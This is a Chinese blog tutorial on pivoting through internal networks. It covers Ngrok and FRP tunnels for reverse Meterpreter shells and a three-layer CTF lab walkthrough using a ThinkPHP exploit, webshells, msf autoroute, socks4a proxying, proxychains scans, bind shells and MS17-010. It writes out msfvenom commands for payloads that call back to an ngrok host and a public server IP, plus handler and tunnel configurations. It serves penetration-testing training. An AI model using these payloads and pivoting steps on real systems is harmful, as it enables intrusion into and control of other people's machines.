当前位置:   article > 正文

内网安全-域横向内网漫游Socks代理隧道技术_内网安全-域横向内网漫游 socks 代理隧道技术

内网安全-域横向内网漫游 socks 代理隧道技术

在这里插入图片描述
因为是两个局域网
当你用kali生成一个后门文件放到目标主机
设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上
设置为内网地址时,又找不到你
在这里插入图片描述

在这里插入图片描述

案例 1-内网穿透 Ngrok 测试演示-两个内网通讯上线

1.注册-购买-填写-确认 http://www.ngrok.cc/
协议:http 本地端口:192.168.76.132:4444

2.测试:内网 1 执行后门-免费主机处理-内网 2 监听-内网 2 接受器
./sunny clientid aa0676878c162ffc
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o
test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
exploit
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12

案例 2-内网穿透 Frp 自建跳板测试-两个内网通讯上线

因为自己本机是内网的,受害者主机也是内网的
所以不能直接通讯,我们接收不到受害者主机反弹回的信息,此时我们就可以自己搭建一个跳板服务器
当受害者运行后门文件后将信息回弹到公网的跳板服务器上,与公网服务器建立连接
然后我们再从本机去监听公网的服务器,从而就间接的与受害者主机建立了会话

自行搭建,方便修改,成本低,使用多样化

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件 frps.ini:
[common]
bind_port = 6677
启动服务端:
./frps -c ./frps.ini

2.控制端-下载-解压-修改-启动
控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主机 ip
server_port = 6677 #frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的 5555
remote_port = 6000 #服务端用 6000 端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

3.靶机运行 frp 即可
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29

内网主机处

frpc.ini里面是客户端的设置信息(也就是攻击者的内网主机要设置的信息)
frps.ini里面是服务的的设置信息(服务器端的设置信息)
在这里插入图片描述frpc.ini的设置

此处的大致意思为:
我kali本机去请求外网服务器的6677端口
然后外网服务器通过它本身的6000端口将数据转发给我本机的5555端口上
在这里插入图片描述
外网服务器处

因为这里是服务器处,所以需要修改frps.ini即可

在这里插入图片描述
设置完后,执行./frps -c ./frps.ini启动服务器端
在这里插入图片描述
外网服务器端启动后,到内网自己的kali主机处执行命令./frps -c ./frps.ini去连接外网上的frp
在这里插入图片描述此时外网服务器端也收到了访问,证明连接成功
在这里插入图片描述
本地kali生成后门

通过msf生成后门,后门反弹的地址为公网服务器的ip
在这里插入图片描述
kali生成后门后对本地的5555端口进行监听
因为当后门返回信息的时候会将数据发送到公网的6000端口上
然后公网会将6000端口上的数据回弹到本地的5555端口,所以监听本地5555端口即可
在这里插入图片描述
当目标机执行后门文件后,kali这边就会收到目标主机的会话,可对目标主机进行操作
在这里插入图片描述

案例 3-CFS 三层内网漫游安全测试演练-某 CTF 线下 2019

大致思路:
攻击者与Target1的NAT网卡是同一网段,先通过同一网段入侵到Target1,再通过Target1上的VMnet3网卡,与Target2建立通信并入侵,然后切通过Target2上的VMnet4网卡,入侵Target3
在这里插入图片描述

第一步:

首先通过namp扫描找到Target1的192.168.76.148这个地址,进行访问
在这里插入图片描述
直接通过thinkphp5的exp来上传一句话木马连接
在这里插入图片描述
在这里插入图片描述

第二步:

通过本地虚拟机的kali生成一个msf后门
后门反弹的地址为kali机的1111端口
在这里插入图片描述
kali这边再通过msf来监听本地的1111端口,等待受害者执行后门文件并上线

因为kali和Target1两个主机都是76网段的,它们可以直接互相通信,后门可以直接将数据反弹到kali上
所以不用做跳板服务器,如果两个主机都是不同的内网环境,则需要做跳板服务器
在这里插入图片描述

第三步:

通过webshell将生成的后门文件上传到对方主机
在这里插入图片描述
打开蚁剑命令行窗口,通过chmod命令给予后门执行权限,并执行
在这里插入图片描述
执行后,kali这个的监听器成功接收到会话
在这里插入图片描述

第四步:

此时我们kali已经入侵Target1并且网段为76,如何让kali访问22网段与Target2建立通信呢

首先通过命令run get_local_subnets获取Target1的网卡信息,发现确实有22这个网卡
在这里插入图片描述
通过命令run autoroute -p查看当前路由,发现当前路由是空的

在这里插入图片描述
通过命令run autoroute -s 192.168.22.0/24来添加对22网段的路由
在这里插入图片描述

重新查看路由,已经添加上22网段
会话为session1,添加完路由后就可以与22这个网段进行通信了
在这里插入图片描述
此时又出现了一个问题,msf上添加完路由已经可以对Target2进行通信了,但是这个路由是保存在msf的session1会话上的,只是msf与Target2建立的通信,要想用msf上没有的工具进行操作攻击是不行的

解决:msf已经可以和target2进行通讯了,可以让msf在kali上设置一个代理端口,让其他工具通过这个端口来借助msf与target2建立的会话对target2进行测试

第五步:

先background退出下回弹的shell会话

通过use auxiliary/server/socks4a载入模块
在这里插入图片描述
设置端口
在这里插入图片描述
exploit启动模块
启动后msf会在本机kali开启一个2222端口
通过socks4协议,将当前msf的会话分享到2222代理端口上
kali可以通过其他的工具去访问代理端口
在这里插入图片描述

第六步:

配置 proxychains 后调用工具探针 Target2

proxychains是一个代理工具
proxychains可以调用别的工具去访问刚才通过socks4协议设置的2222代理端口

修改配置文件
在这里插入图片描述
此处为kali机的ip与刚才通过socks4协议设置的2222代理端口号
在这里插入图片描述
通过proxychains来调用nmap对22网段进行扫描,这里时间关系就直接扫描target2主机在22网段的ip了

下面可以看到,namp通过msf设置在kali机192.168.76.132上的2222代理端口,对Target2主机192.168.22.128进行扫描
在这里插入图片描述
扫描结果,发现192.168.22.128上的80端口开放

第七步:

kali这边通过浏览器去访问192.168.22.128

需先给浏览器设置代理,设置为之前msf在本地生成的2222代理端口(因为kali与Target2不是一个网段所以访问不到,但是msf通过入侵的Target1与Target2建立了通信可以访问,所以需将浏览器代理设置为msf在kali的代理端口再进行访问)
在这里插入图片描述
在这里插入图片描述
查看源代码,发现提示
在这里插入图片描述
通过注入获取管理员账号密码
在这里插入图片描述
访问robots.txt发现后台地址

在这里插入图片描述
登陆后台,再index.php中写入一句话木马
在这里插入图片描述

第八步:

写入一句话木马后,通过蚁剑连接
因为我本地windows主机的网段是76,所以访问不到Target2,自然也连接上,但本地windows可以和kali进行通信

方法一:
可以在蚁剑处设置代理,设置为msf在kali上开的2222代理端口
在这里插入图片描述连接成功
在这里插入图片描述
方法二:
如果想用其他工具,但是这个工具不能设置代理的情况下

profixier全局代理工具
在这里插入图片描述
在这里插入图片描述
配置完代理后,添加应用程序,被添加的应用程序就会自动走你刚才设置的代理

方法三:
SocksCap64代理工具
管理员运行打开
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
添加完后右键
在这里插入图片描述

第九步:

拿到Target2的webshell后,怎么通过进行连接

前面Target1是通过msf生成的后门,然后Target1去执行将数据发送到msf上,建立的连接(反向后门)

但是这里,msf生成后门,Target2执行后,因为Target2和msf所在的kali机不是一个网段,所以Target2找不到kali机
这里就需要生成正向后门(让msf所在的kali机去找Target2,因为msf入侵的Target1和Target2是一个网段的)

生成正向后门
在这里插入图片描述

设置监听器并执行
这里就相当于我们的msf不断的去请求连接Target2的3333端口
在这里插入图片描述
通过webshell将后门上传到Target2上并执行
执行后木马就会在Target2上开启一个3333端口让msf进行连接
在这里插入图片描述
执行完木马后,msf这边连接成功,返回会话
在这里插入图片描述

第十步:

查看Target2上的网络环境
在这里插入图片描述
查看Target2上的路由,什么都没有
在这里插入图片描述
添加对33网段的路由,好访问Target3
在这里插入图片描述

第十一步:

msf与Target3建立了连接后,先background退出会话

然后重复之前第五步和第六步的操作,用msf在kali上设置一个代理端口,通过proxychains去调用nmap进行扫描

这里因为跟上面步骤重复,就不进行演示了,nmap扫描出Target3存在ms-17010漏洞

第十二步:

通过msf生成正向的ms-17010漏洞的exp(因为Target3无法将信息回弹到msf,所以需生成正向的exp)
在这里插入图片描述
设置payload
在这里插入图片描述

设置目标主机,并执行
如果不成功则需要进入session1会话设置并执行
在这里插入图片描述

第十三步:

会话反弹成功
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/2023面试高手/article/detail/557822
推荐阅读
相关标签
  

闽ICP备14008679号